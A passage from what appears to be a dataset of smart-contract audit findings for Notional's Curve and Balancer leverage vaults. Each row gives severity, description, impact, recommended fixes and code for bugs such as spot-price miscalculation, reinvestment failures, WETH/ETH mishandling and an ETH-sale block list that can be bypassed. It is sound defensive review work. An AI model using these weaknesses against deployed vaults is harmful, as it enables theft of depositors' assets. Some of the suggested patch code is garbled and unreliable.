// A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n **********************************************************************************************/\\n```\\n\\nWithin the `_poolDerivatives` function, the `balances` used to compute the invariant consist of the balance of all tokens in the pool, except for BPT, which is aligned with the earlier understanding.\\n```\\nexport function _poolDerivatives(\\n A: BigNumber,\\n balances: OldBigNumber[],\\n tokenIndexIn: number,\\n tokenIndexOut: number,\\n is_first_derivative: boolean,\\n wrt_out: boolean\\n): OldBigNumber {\\n const totalCoins = balances.length;\\n const D = _invariant(A, balances);\\n```\\n","Review if there is any specific reason for passing in only the balance of two tokens when computing the invariant. Otherwise, the balance of all tokens (except BPT) should be used to compute the invariant.\\nIn addition, it is recommended to include additional tests to ensure that the computed spot price is aligned with the market price.","An incorrect invariant will lead to an incorrect spot price being computed. The spot price is used within the `_checkPriceAndCalculateValue` function that is intended to revert if the spot price on the pool is not within some deviation tolerance of the implied oracle price to prevent any pool manipulation. As a result, incorrect spot price leads to false positives or false negatives, where, in the worst-case scenario, pool manipulation was not caught by this function, and the transaction proceeded to be executed.\\nThe `_checkPriceAndCalculateValue` function was found to be used within the following functions:\\n`reinvestReward` - If the `_checkPriceAndCalculateValue` function is malfunctioning, it will cause the vault to add liquidity into a pool that has been manipulated, leading to a loss of assets.\\n`convertStrategyToUnderlying` - This function is used by Notional V3 for the purpose of computing the collateral values and the account's health factor. If the `_checkPriceAndCalculateValue` function reverts unexpectedly due to an incorrect invariant/spot price, many of Notional's core functions will break. In addition, the collateral values and the account's health factor might be inflated if it fails to detect a manipulated pool due to incorrect invariant/spot price, potentially allowing the malicious actors to drain the main protocol.","```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n..SNIP..\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice(ampParam, invariant, scaledPrimary, secondary);\\n..SNIP..\\n```\\n" +Unable to reinvest if the reward token equals one of the pool tokens,high,"If the reward token is the same as one of the pool tokens, the protocol would not be able to reinvest such a reward token. Thus leading to a loss of assets for the vault shareholders.\\nDuring the reinvestment process, the `reinvestReward` function will be executed once for each reward token. The length of the `trades` listing defined in the payload must be the same as the number of tokens in the pool per Line 339 below.\\n```\\nFile: SingleSidedLPVaultBase.sol\\n function reinvestReward(\\n SingleSidedRewardTradeParams[] calldata trades,\\n uint256 minPoolClaim\\n ) external whenNotLocked onlyRole(REWARD_REINVESTMENT_ROLE) returns (\\n address rewardToken,\\n uint256 amountSold,\\n uint256 poolClaimAmount\\n ) {\\n // Will revert if spot prices are not in line with the oracle values\\n _checkPriceAndCalculateValue();\\n\\n // Require one trade per token, if we do not want to buy any tokens at a\\n // given index then the amount should be set to zero. This applies to pool\\n // tokens like in the ComposableStablePool.\\n require(trades.length == NUM_TOKENS());\\n uint256[] memory amounts;\\n (rewardToken, amountSold, amounts) = _executeRewardTrades(trades);\\n```\\n\\nIn addition, due to the requirement at Line 105, each element in the `trades` listing must be a token within a pool and must be ordered in sequence according to the token index of the pool.\\n```\\nFile: StrategyUtils.sol\\n function executeRewardTrades(\\n IERC20[] memory tokens,\\n SingleSidedRewardTradeParams[] calldata trades,\\n address rewardToken,\\n address poolToken\\n ) external returns(uint256[] memory amounts, uint256 amountSold) {\\n amounts = new uint256[](trades.length);\\n for (uint256 i; i < trades.length; i++) {\\n // All trades must sell the same token.\\n require(trades[i].sellToken == rewardToken);\\n // Bypass certain invalid trades\\n if (trades[i].amount == 0) continue;\\n if (trades[i].buyToken == poolToken) continue;\\n\\n // The reward trade can only purchase tokens that go into the pool\\n require(trades[i].buyToken == address(tokens[i]));\\n```\\n\\nAssuming the TriCRV Curve pool (crvUSD+WETH+CRV) has two reward tokens (CRV & CVX). This example is taken from a live Curve pool on Ethereum (Reference 1 Reference 2)\\nThe pool will consist of the following tokens:\\n```\\ntokens[0] = crvUSD\\ntokens[1] = WETH\\ntokens[2] = CRV\\n```\\n\\nThus, if the protocol receives 3000 CVX reward tokens and it intends to sell 1000 CVX for crvUSD and 1000 CVX for WETH.\\nThe `trades` list has to be defined as below.\\n```\\ntrades[0].sellToken[0] = CRV (rewardToken) | trades[0].buyToken = crvUSD | trades[0].amount = 1000\\ntrades[1].sellToken[1] = CRV (rewardToken) | trades[1].buyToken = WETH | trades[0].amount = 1000\\ntrades[1].sellToken[2] = CRV (rewardToken) | trades[1].buyToken = CRV | trades[0].amount = 0\\n```\\n\\nThe same issue also affects the Balancer pools. Thus, the example is omitted for brevity. One of the affected Balancer pools is as follows, where the reward token is also one of the pool tokens.\\nWETH-AURA - Reference 1 Reference 2 (Reward Tokens = [BAL, AURA])\\nHowever, the issue is that the `_isInvalidRewardToken` function within the `_executeRewardTrades` will always revert.\\n```\\nFile: SingleSidedLPVaultBase.sol\\n function _executeRewardTrades(SingleSidedRewardTradeParams[] calldata trades) internal returns (\\n address rewardToken,\\n uint256 amountSold,\\n uint256[] memory amounts\\n ) {\\n // The sell token on all trades must be the same (checked inside executeRewardTrades) so\\n // just validate here that the sellToken is a valid reward token (i.e. none of the tokens\\n // used in the regular functioning of the vault).\\n rewardToken = trades[0].sellToken;\\n if (_isInvalidRewardToken(rewardToken)) revert Errors.InvalidRewardToken(rewardToken);\\n (IERC20[] memory tokens, /* */) = TOKENS();\\n (amounts, amountSold) = StrategyUtils.executeRewardTrades(\\n tokens, trades, rewardToken, address(POOL_TOKEN())\\n );\\n }\\n```\\n\\nThe reason is that within the `_isInvalidRewardToken` function it checks if the reward token to be sold is any of the pool tokens. In this case, the condition will be evaluated to be true, and a revert will occur. As a result, the protocol would not be able to reinvest such reward tokens.\\n```\\nFile: AuraStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == TOKEN_3 ||\\n token == TOKEN_4 ||\\n token == TOKEN_5 ||\\n token == address(AURA_BOOSTER) ||\\n token == address(AURA_REWARD_POOL) ||\\n token == address(Deployments.WETH)\\n );\\n }\\n```\\n\\n```\\nFile: ConvexStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n }\\n```\\n","Consider tracking the number of pool tokens received during an emergency exit, and segregate these tokens with the reward tokens. For instance, the vault has 3000 CVX, 1000 of them are received during the emergency exit, while the rest are reward tokens emitted from Convex/Aura. In this case, the protocol can sell all CVX on the vault except for the 1000 CVX reserved.","The reinvestment of reward tokens is a critical component of the vault. The value per vault share increases when reward tokens are sold for the pool tokens and reinvested back into the Curve/Balancer pool to obtain more LP tokens. If this feature does not work as intended, it will lead to a loss of assets for the vault shareholders.","```\\nFile: SingleSidedLPVaultBase.sol\\n function reinvestReward(\\n SingleSidedRewardTradeParams[] calldata trades,\\n uint256 minPoolClaim\\n ) external whenNotLocked onlyRole(REWARD_REINVESTMENT_ROLE) returns (\\n address rewardToken,\\n uint256 amountSold,\\n uint256 poolClaimAmount\\n ) {\\n // Will revert if spot prices are not in line with the oracle values\\n _checkPriceAndCalculateValue();\\n\\n // Require one trade per token, if we do not want to buy any tokens at a\\n // given index then the amount should be set to zero. This applies to pool\\n // tokens like in the ComposableStablePool.\\n require(trades.length == NUM_TOKENS());\\n uint256[] memory amounts;\\n (rewardToken, amountSold, amounts) = _executeRewardTrades(trades);\\n```\\n" +Native ETH not received when removing liquidity from Curve V2 pools,high,"Native ETH was not received when removing liquidity from Curve V2 pools due to the mishandling of Native ETH and WETH, leading to a loss of assets.\\nCurve V2 pool will always wrap to WETH and send to leverage vault unless the `use_eth` is explicitly set to `True`. Otherwise, it will default to `False`. The following implementation of the `remove_liquidity_one_coin` function taken from one of the Curve V2 pools shows that unless the `use_eth` is set to `True`, the `WETH.deposit()` will be triggered to wrap the ETH, and WETH will be transferred back to the caller. The same is true for the `remove_liquidity` function, but it is omitted for brevity.\\n```\\n@external\\n@nonreentrant('lock')\\ndef remove_liquidity_one_coin(token_amount: uint256, i: uint256, min_amount: uint256,\\n use_eth: bool = False, receiver: address = msg.sender) -> uint256:\\n A_gamma: uint256[2] = self._A_gamma()\\n\\n dy: uint256 = 0\\n D: uint256 = 0\\n p: uint256 = 0\\n xp: uint256[N_COINS] = empty(uint256[N_COINS])\\n future_A_gamma_time: uint256 = self.future_A_gamma_time\\n dy, p, D, xp = self._calc_withdraw_one_coin(A_gamma, token_amount, i, (future_A_gamma_time > 0), True)\\n assert dy >= min_amount, ""Slippage""\\n\\n if block.timestamp >= future_A_gamma_time:\\n self.future_A_gamma_time = 1\\n\\n self.balances[i] -= dy\\n CurveToken(self.token).burnFrom(msg.sender, token_amount)\\n\\n coin: address = self.coins[i]\\n if use_eth and coin == WETH20:\\n raw_call(receiver, b"""", value=dy)\\n else:\\n if coin == WETH20:\\n WETH(WETH20).deposit(value=dy)\\n response: Bytes[32] = raw_call(\\n coin,\\n _abi_encode(receiver, dy, method_id=method_id(""transfer(address,uint256)"")),\\n max_outsize=32,\\n )\\n if len(response) != 0:\\n assert convert(response, bool)\\n```\\n\\nNotional's Leverage Vault only works with Native ETH. It was found that the `remove_liquidity_one_coin` and `remove_liquidity` functions are executed without explicitly setting the `use_eth` parameter to `True`. Thus, WETH instead of Native ETH will be returned during remove liquidity. As a result, these WETH will not be accounted for in the vault and result in a loss of assets.\\n```\\nFile: Curve2TokenConvexVault.sol\\n function _unstakeAndExitPool(\\n..SNIP..\\n ICurve2TokenPool pool = ICurve2TokenPool(CURVE_POOL);\\n exitBalances = new uint256[](2);\\n if (isSingleSided) {\\n // Redeem single-sided\\n exitBalances[_PRIMARY_INDEX] = pool.remove_liquidity_one_coin(\\n poolClaim, int8(_PRIMARY_INDEX), _minAmounts[_PRIMARY_INDEX]\\n );\\n } else {\\n // Redeem proportionally, min amounts are rewritten to a fixed length array\\n uint256[2] memory minAmounts;\\n minAmounts[0] = _minAmounts[0];\\n minAmounts[1] = _minAmounts[1];\\n\\n uint256[2] memory _exitBalances = pool.remove_liquidity(poolClaim, minAmounts);\\n exitBalances[0] = _exitBalances[0];\\n exitBalances[1] = _exitBalances[1];\\n }\\n```\\n","If one of the pool tokens is ETH, consider setting `is_eth` to true when calling `remove_liquidity_one_coin` and `remove_liquidity` functions to ensure that Native ETH is sent back to the vault.","Following are some of the impacts due to the mishandling of Native ETH and WETH during liquidity removal in Curve pools, leading to loss of assets:\\nWithin the `redeemFromNotional`, if the vaults consist of ETH, the `_UNDERLYING_IS_ETH` will be set to true. In this case, the code will attempt to call `transfer` to `transfer` Native ETH, which will fail as Native ETH is not received and users/Notional are unable to redeem.\\n`File: BaseStrategyVault.sol\\n175: function redeemFromNotional(\\n..SNIP..\\n199: if (_UNDERLYING_IS_ETH) {\\n200: if (transferToReceiver > 0) payable(receiver).transfer(transferToReceiver);\\n201: if (transferToNotional > 0) payable(address(NOTIONAL)).transfer(transferToNotional);\\n202: } else {\\n..SNIP..`\\nWETH will be received instead of Native ETH during the emergency exit. During vault restoration, WETH is not re-entered into the pool as only Native ETH residing in the vault will be transferred to the pool. Leverage vault only works with Native ETH, and if one of the pool tokens is WETH, it will be converted to Native ETH (0x0 or 0xEeeee) during deployment/initialization. Thus, the WETH is stuck in the vault. This causes the value per share to drop significantly. (Reference)\\n`File: SingleSidedLPVaultBase.sol\\n480: function emergencyExit(\\n481: uint256 claimToExit, bytes calldata /* data */\\n482: ) external override onlyRole(EMERGENCY_EXIT_ROLE) {\\n483: StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n484: if (claimToExit == 0) claimToExit = state.totalPoolClaim;\\n485: \\n486: // By setting min amounts to zero, we will accept whatever tokens come from the pool\\n487: // in a proportional exit. Front running will not have an effect since no trading will\\n488: // occur during a proportional exit.\\n489: _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), true);\\n490: \\n491: state.totalPoolClaim = state.totalPoolClaim - claimToExit;\\n492: state.setStrategyVaultState();`","```\\n@external\\n@nonreentrant('lock')\\ndef remove_liquidity_one_coin(token_amount: uint256, i: uint256, min_amount: uint256,\\n use_eth: bool = False, receiver: address = msg.sender) -> uint256:\\n A_gamma: uint256[2] = self._A_gamma()\\n\\n dy: uint256 = 0\\n D: uint256 = 0\\n p: uint256 = 0\\n xp: uint256[N_COINS] = empty(uint256[N_COINS])\\n future_A_gamma_time: uint256 = self.future_A_gamma_time\\n dy, p, D, xp = self._calc_withdraw_one_coin(A_gamma, token_amount, i, (future_A_gamma_time > 0), True)\\n assert dy >= min_amount, ""Slippage""\\n\\n if block.timestamp >= future_A_gamma_time:\\n self.future_A_gamma_time = 1\\n\\n self.balances[i] -= dy\\n CurveToken(self.token).burnFrom(msg.sender, token_amount)\\n\\n coin: address = self.coins[i]\\n if use_eth and coin == WETH20:\\n raw_call(receiver, b"""", value=dy)\\n else:\\n if coin == WETH20:\\n WETH(WETH20).deposit(value=dy)\\n response: Bytes[32] = raw_call(\\n coin,\\n _abi_encode(receiver, dy, method_id=method_id(""transfer(address,uint256)"")),\\n max_outsize=32,\\n )\\n if len(response) != 0:\\n assert convert(response, bool)\\n```\\n" +Single-sided instead of proportional exit is performed during emergency exit,high,"Single-sided instead of proportional exit is performed during emergency exit, which could lead to a loss of assets during emergency exit and vault restoration.\\nPer the comment in Line 476 below, the BPT should be redeemed proportionally to underlying tokens during an emergency exit. However, it was found that the `_unstakeAndExitPool` function is executed with the `isSingleSided` parameter set to `true`.\\n```\\nFile: SingleSidedLPVaultBase.sol\\n /// @notice Allows the emergency exit role to trigger an emergency exit on the vault.\\n /// In this situation, the `claimToExit` is withdrawn proportionally to the underlying\\n /// tokens and held on the vault. The vault is locked so that no entries, exits or\\n /// valuations of vaultShares can be performed.\\n /// @param claimToExit if this is set to zero, the entire pool claim is withdrawn\\n function emergencyExit(\\n uint256 claimToExit, bytes calldata /* data */\\n ) external override onlyRole(EMERGENCY_EXIT_ROLE) {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n if (claimToExit == 0) claimToExit = state.totalPoolClaim;\\n\\n // By setting min amounts to zero, we will accept whatever tokens come from the pool\\n // in a proportional exit. Front running will not have an effect since no trading will\\n // occur during a proportional exit.\\n _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), true);\\n```\\n\\nIf the `isSingleSided` is set to `True`, the `EXACT_BPT_IN_FOR_ONE_TOKEN_OUT` will be used, which is incorrect. Per the Balancer's documentation, `EXACT_BPT_IN_FOR_ONE_TOKEN_OUT` is a single asset exit where the user sends a precise quantity of BPT, and receives an estimated but unknown (computed at run time) quantity of a single token.\\nTo perform a proportional exit, the `EXACT_BPT_IN_FOR_TOKENS_OUT` should be used instead.\\n```\\nFile: BalancerComposableAuraVault.sol\\n function _unstakeAndExitPool(\\n uint256 poolClaim, uint256[] memory minAmounts, bool isSingleSided\\n ) internal override returns (uint256[] memory exitBalances) {\\n bool success = AURA_REWARD_POOL.withdrawAndUnwrap(poolClaim, false); // claimRewards = false\\n require(success);\\n\\n bytes memory customData;\\n if (isSingleSided) {\\n..SNIP..\\n uint256 primaryIndex = PRIMARY_INDEX();\\n customData = abi.encode(\\n IBalancerVault.ComposableExitKind.EXACT_BPT_IN_FOR_ONE_TOKEN_OUT,\\n poolClaim,\\n primaryIndex < BPT_INDEX ? primaryIndex : primaryIndex - 1\\n );\\n```\\n\\nThe same issue affects the Curve's implementation of the `_unstakeAndExitPool` function.\\n```\\nFile: Curve2TokenConvexVault.sol\\n function _unstakeAndExitPool(\\n uint256 poolClaim, uint256[] memory _minAmounts, bool isSingleSided\\n ) internal override returns (uint256[] memory exitBalances) {\\n..SNIP..\\n ICurve2TokenPool pool = ICurve2TokenPool(CURVE_POOL);\\n exitBalances = new uint256[](2);\\n if (isSingleSided) {\\n // Redeem single-sided\\n exitBalances[_PRIMARY_INDEX] = pool.remove_liquidity_one_coin(\\n poolClaim, int8(_PRIMARY_INDEX), _minAmounts[_PRIMARY_INDEX]\\n );\\n```\\n","Set the `isSingleSided` parameter to `false` when calling the `_unstakeAndExitPool` function to ensure that the proportional exit is performed.\\n```\\nfunction emergencyExit(\\n uint256 claimToExit, bytes calldata /* data */\\n) external override onlyRole(EMERGENCY_EXIT_ROLE) {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n if (claimToExit == 0) claimToExit = state.totalPoolClaim;\\n ..SNIP..\\n// Remove the line below\\n _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), true);\\n// Add the line below\\n _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), false);\\n```\\n","The following are some of the impacts of this issue, which lead to loss of assets:\\nRedeeming LP tokens one-sided incurs unnecessary slippage as tokens have to be swapped internally to one specific token within the pool, resulting in fewer assets received.\\nPer the source code comment below, in other words, unless a proportional exit is performed, the emergency exit will be subjected to front-run attack and slippage.\\n`File: SingleSidedLPVaultBase.sol\\n486: // By setting min amounts to zero, we will accept whatever tokens come from the pool\\n487: // in a proportional exit. Front running will not have an effect since no trading will\\n488: // occur during a proportional exit.\\n489: _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), true);`\\nAfter the emergency exit, the vault only held one of the pool tokens. To re-enter the pool, the vault has to either swap the token to other pool tokens on external DEXs to maintain the proportion or perform a single-sided join. Both of these methods will incur unnecessary slippage, resulting in fewer LP tokens received at the end.","```\\nFile: SingleSidedLPVaultBase.sol\\n /// @notice Allows the emergency exit role to trigger an emergency exit on the vault.\\n /// In this situation, the `claimToExit` is withdrawn proportionally to the underlying\\n /// tokens and held on the vault. The vault is locked so that no entries, exits or\\n /// valuations of vaultShares can be performed.\\n /// @param claimToExit if this is set to zero, the entire pool claim is withdrawn\\n function emergencyExit(\\n uint256 claimToExit, bytes calldata /* data */\\n ) external override onlyRole(EMERGENCY_EXIT_ROLE) {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n if (claimToExit == 0) claimToExit = state.totalPoolClaim;\\n\\n // By setting min amounts to zero, we will accept whatever tokens come from the pool\\n // in a proportional exit. Front running will not have an effect since no trading will\\n // occur during a proportional exit.\\n _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), true);\\n```\\n" +reinvestReward() generates dust totalPoolClaim causing vault abnormal,medium,"If the first user deposits too small , due to the round down, it may result in 0 shares, which will result in 0 shares no matter how much is deposited later. In `National`, this situation will be prevented by setting `a minimum borrow size and a minimum leverage ratio`. However, `reinvestReward()` does not have this restriction, which may cause this problem to still exist, causing the vault to enter an abnormal state.\\nThe calculation of the shares of the vault is as follows:\\n```\\n function _mintVaultShares(uint256 lpTokens) internal returns (uint256 vaultShares) {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n if (state.totalPoolClaim == 0) {\\n // Vault Shares are in 8 decimal precision\\n vaultShares = (lpTokens * uint256(Constants.INTERNAL_TOKEN_PRECISION)) / POOL_PRECISION();\\n } else {\\n vaultShares = (lpTokens * state.totalVaultSharesGlobal) / state.totalPoolClaim;\\n }\\n\\n // Updates internal storage here\\n state.totalPoolClaim += lpTokens;\\n state.totalVaultSharesGlobal += vaultShares.toUint80();\\n state.setStrategyVaultState();\\n```\\n\\nIf the first `deposit` is too small, due to the conversion to `INTERNAL_TOKEN_PRECISION`, the precision is lost, resulting in `vaultShares=0`. Subsequent depositors will enter the second calculation, but `totalVaultSharesGlobal=0`, so `vaultShares` will always be `0`.\\nTo avoid this situation, `Notional` has restrictions.\\nhey guys, just to clarify some rounding issues stuff on vault shares and the precision loss. Notional will enforce a minimum borrow size and a minimum leverage ratio on users which will essentially force their initial deposits to be in excess of any dust amount. so we should not really see any tiny deposits that result in rounding down to zero vault shares. If there was rounding down to zero, the account will likely fail their collateral check as the vault shares act as collateral and the would have none. there is the possibility of a dust amount entering into depositFromNotional in a valid state, that would be due to an account ""rolling"" a position from one debt maturity to another. in this case, a small excess amount of deposit may come into the vault but the account would still be forced to be holding a sizeable position overall due to the minium borrow size.\\nin `reinvestReward()`, not this limit\\n```\\n function reinvestReward(\\n SingleSidedRewardTradeParams[] calldata trades,\\n uint256 minPoolClaim\\n ) external whenNotLocked onlyRole(REWARD_REINVESTMENT_ROLE) returns (\\n address rewardToken,\\n uint256 amountSold,\\n uint256 poolClaimAmount\\n ) {\\n // Will revert if spot prices are not in line with the oracle values\\n _checkPriceAndCalculateValue();\\n\\n // Require one trade per token, if we do not want to buy any tokens at a\\n // given index then the amount should be set to zero. This applies to pool\\n // tokens like in the ComposableStablePool.\\n require(trades.length == NUM_TOKENS());\\n uint256[] memory amounts;\\n (rewardToken, amountSold, amounts) = _executeRewardTrades(trades);\\n\\n poolClaimAmount = _joinPoolAndStake(amounts, minPoolClaim);\\n\\n // Increase LP token amount without minting additional vault shares\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n state.totalPoolClaim += poolClaimAmount;\\n state.setStrategyVaultState();\\n\\n emit RewardReinvested(rewardToken, amountSold, poolClaimAmount);\\n }\\n```\\n\\nFrom the above code, we know that `reinvestReward()` will increase `totalPoolClaim`, but will not increase `totalVaultSharesGlobal`.\\nThis will cause problems in the following scenarios:\\nThe current vault has deposits.\\n`Rewards` have been generated, but `reinvestReward()` has not been executed.\\nThe `bot` submitted the `reinvestReward()` transaction. but step 4 execute first\\nThe users took away all the deposits `totalPoolClaim = 0`, `totalVaultSharesGlobal=0`.\\nAt this time `reinvestReward()` is executed, then `totalPoolClaim > 0`, `totalVaultSharesGlobal=0`.\\nOther users' deposits will fail later\\nIt is recommended that `reinvestReward()` add a judgment of `totalVaultSharesGlobal>0`.\\nNote: If there is a malicious REWARD_REINVESTMENT_ROLE, it can provoke this issue by donating reward token and triggering reinvestReward() before the first depositor appears.","```\\n function reinvestReward(\\n SingleSidedRewardTradeParams[] calldata trades,\\n uint256 minPoolClaim\\n ) external whenNotLocked onlyRole(REWARD_REINVESTMENT_ROLE) returns (\\n address rewardToken,\\n uint256 amountSold,\\n uint256 poolClaimAmount\\n ) {\\n // Will revert if spot prices are not in line with the oracle values\\n _checkPriceAndCalculateValue();\\n\\n // Require one trade per token, if we do not want to buy any tokens at a\\n // given index then the amount should be set to zero. This applies to pool\\n // tokens like in the ComposableStablePool.\\n require(trades.length == NUM_TOKENS());\\n uint256[] memory amounts;\\n (rewardToken, amountSold, amounts) = _executeRewardTrades(trades);\\n\\n poolClaimAmount = _joinPoolAndStake(amounts, minPoolClaim);\\n\\n // Increase LP token amount without minting additional vault shares\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n// Add the line below\\n require(state.totalVaultSharesGlobal > 0 ,""invalid shares"");\\n state.totalPoolClaim // Add the line below\\n= poolClaimAmount;\\n state.setStrategyVaultState();\\n\\n emit RewardReinvested(rewardToken, amountSold, poolClaimAmount);\\n }\\n```\\n",reinvestReward() generates dust totalPoolClaim causing vault abnormal,```\\n function _mintVaultShares(uint256 lpTokens) internal returns (uint256 vaultShares) {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n if (state.totalPoolClaim == 0) {\\n // Vault Shares are in 8 decimal precision\\n vaultShares = (lpTokens * uint256(Constants.INTERNAL_TOKEN_PRECISION)) / POOL_PRECISION();\\n } else {\\n vaultShares = (lpTokens * state.totalVaultSharesGlobal) / state.totalPoolClaim;\\n }\\n\\n // Updates internal storage here\\n state.totalPoolClaim += lpTokens;\\n state.totalVaultSharesGlobal += vaultShares.toUint80();\\n state.setStrategyVaultState();\\n```\\n +ETH can be sold during reinvestment,medium,"The existing control to prevent ETH from being sold during reinvestment can be bypassed, allowing the bots to accidentally or maliciously sell off the non-reward assets of the vault.\\nMultiple instances of this issue were found:\\nInstance 1 - Curve's Implementation\\nThe `_isInvalidRewardToken` function attempts to prevent the callers from selling away ETH during reinvestment.\\n```\\nFile: ConvexStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n }\\n```\\n\\nHowever, the code at Line 67 above will not achieve the intended outcome as `Deployments.ALT_ETH_ADDRESS` is not a valid token address in the first place.\\n```\\naddress internal constant ALT_ETH_ADDRESS = 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE;\\n```\\n\\nWhen the caller is executing a trade with ETH, the address for ETH used is either `Deployments.WETH` or `Deployments.ETH_ADDRESS` (address(0)) as shown in the TradingUtils's source code, not the `Deployments.ALT_ETH_ADDRESS`.\\n```\\nFile: TradingUtils.sol\\n function _executeTrade(\\n address target,\\n uint256 msgValue,\\n bytes memory params,\\n address spender,\\n Trade memory trade\\n ) private {\\n uint256 preTradeBalance;\\n \\n if (trade.buyToken == address(Deployments.WETH)) {\\n preTradeBalance = address(this).balance;\\n } else if (trade.buyToken == Deployments.ETH_ADDRESS || _needsToUnwrapExcessWETH(trade, spender)) {\\n preTradeBalance = IERC20(address(Deployments.WETH)).balanceOf(address(this));\\n }\\n```\\n\\nAs a result, the caller (bot) of the reinvestment function could still sell off the ETH from the vault, bypassing the requirement.\\nInstance 2 - Balancer's Implementation\\nWhen the caller is executing a trade with ETH, the address for ETH used is either `Deployments.WETH` or `Deployments.ETH_ADDRESS` (address(0)), as mentioned earlier. However, the `AuraStakingMixin._isInvalidRewardToken` function only blocks `Deployments.WETH` but not `Deployments.ETH`, thus allowing the caller (bot) of the reinvestment function, could still sell off the ETH from the vault, bypassing the requirement.\\n```\\nFile: AuraStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == TOKEN_3 ||\\n token == TOKEN_4 ||\\n token == TOKEN_5 ||\\n token == address(AURA_BOOSTER) ||\\n token == address(AURA_REWARD_POOL) ||\\n token == address(Deployments.WETH)\\n );\\n }\\n```\\n\\nPer the sponsor's clarification below, the contracts should protect against the bot doing unintended things (including acting maliciously) due to coding errors, which is one of the main reasons for having the `_isInvalidRewardToken` function. Thus, this issue is a valid bug in the context of this audit contest.\\n","To ensure that ETH cannot be sold off during reinvestment, consider the following changes:\\nCurve\\n```\\nFile: ConvexStakingMixin.sol\\nfunction _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n// Add the line below\\n token == Deployments.ETH ||\\n// Add the line below\\n token == Deployments.WETH ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n}\\n```\\n\\nBalancer\\n```\\nFile: AuraStakingMixin.sol\\nfunction _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == TOKEN_3 ||\\n token == TOKEN_4 ||\\n token == TOKEN_5 ||\\n token == address(AURA_BOOSTER) ||\\n token == address(AURA_REWARD_POOL) ||\\n// Add the line below\\n token == address(Deployments.ETH) \\n token == address(Deployments.WETH)\\n );\\n}\\n```\\n","The existing control to prevent ETH from being sold during reinvestment can be bypassed, allowing the bots to accidentally or maliciously sell off the non-reward assets of the vault.",```\\nFile: ConvexStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n }\\n```\\n +Leverage Vault on sidechains that support Curve V2 pools is broken,medium,"No users will be able to deposit to the Leverage Vault on Arbitrum and Optimism that supports Curve V2 pools, leading to the core contract functionality of a vault being broken and a loss of revenue for the protocol.\\nFollowing are examples of some Curve V2 pools in Arbitum:\\nThe code from Line 64 to Line 71 is only executed if the contract resides on Ethereum. As a result, for Arbitrum and Optimism sidechains, the `IS_CURVE_V2` variable is always false.\\n```\\nFile: Curve2TokenPoolMixin.sol\\n constructor(\\n NotionalProxy notional_,\\n DeploymentParams memory params\\n ) SingleSidedLPVaultBase(notional_, params.tradingModule) {\\n CURVE_POOL = params.pool;\\n\\n bool isCurveV2 = false;\\n if (Deployments.CHAIN_ID == Constants.CHAIN_ID_MAINNET) {\\n address[10] memory handlers = \\n Deployments.CURVE_META_REGISTRY.get_registry_handlers_from_pool(address(CURVE_POOL));\\n\\n require(\\n handlers[0] == Deployments.CURVE_V1_HANDLER ||\\n handlers[0] == Deployments.CURVE_V2_HANDLER\\n ); // @dev unknown Curve version\\n isCurveV2 = (handlers[0] == Deployments.CURVE_V2_HANDLER);\\n }\\n IS_CURVE_V2 = isCurveV2;\\n```\\n\\nAs a result, code within the `_joinPoolAndStake` function will always call the Curve V1's `add_liquidity` function that does not define the `use_eth` parameter.\\n```\\nFile: Curve2TokenConvexVault.sol\\n function _joinPoolAndStake(\\n..SNIP..\\n // Slightly different method signatures in v1 and v2\\n if (IS_CURVE_V2) {\\n lpTokens = ICurve2TokenPoolV2(CURVE_POOL).add_liquidity{value: msgValue}(\\n amounts, minPoolClaim, 0 < msgValue // use_eth = true if 